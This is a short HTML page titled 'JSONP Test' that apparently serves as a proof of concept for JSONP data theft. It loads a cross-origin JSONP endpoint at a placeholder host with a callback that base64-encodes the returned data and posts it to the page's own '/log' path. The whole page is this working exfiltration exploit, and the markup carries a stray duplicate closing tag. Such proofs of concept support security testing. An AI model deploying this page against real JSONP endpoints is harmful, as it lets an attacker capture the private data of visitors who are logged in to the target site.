<!DOCTYPE html>
<html>
<head>
    <title>JSONP Test</title>
</head>
<body>
<h1>JSONP Test</h1>
<script>
    function sendFunc(data) {
        const base64data = btoa(JSON.stringify(data));
        fetch('/log', {
            method: 'POST',
            headers: {'Content-Type': 'application/json'},
            body: JSON.stringify({data: base64data}),
        });
    }

</script>
<script type="text/javascript"
        src="https://xxx.yyy.zzz/List?productName=p2&pageSize=10&pageNo=1&callback=sendFunc"></script>
</body>
</html>

</html>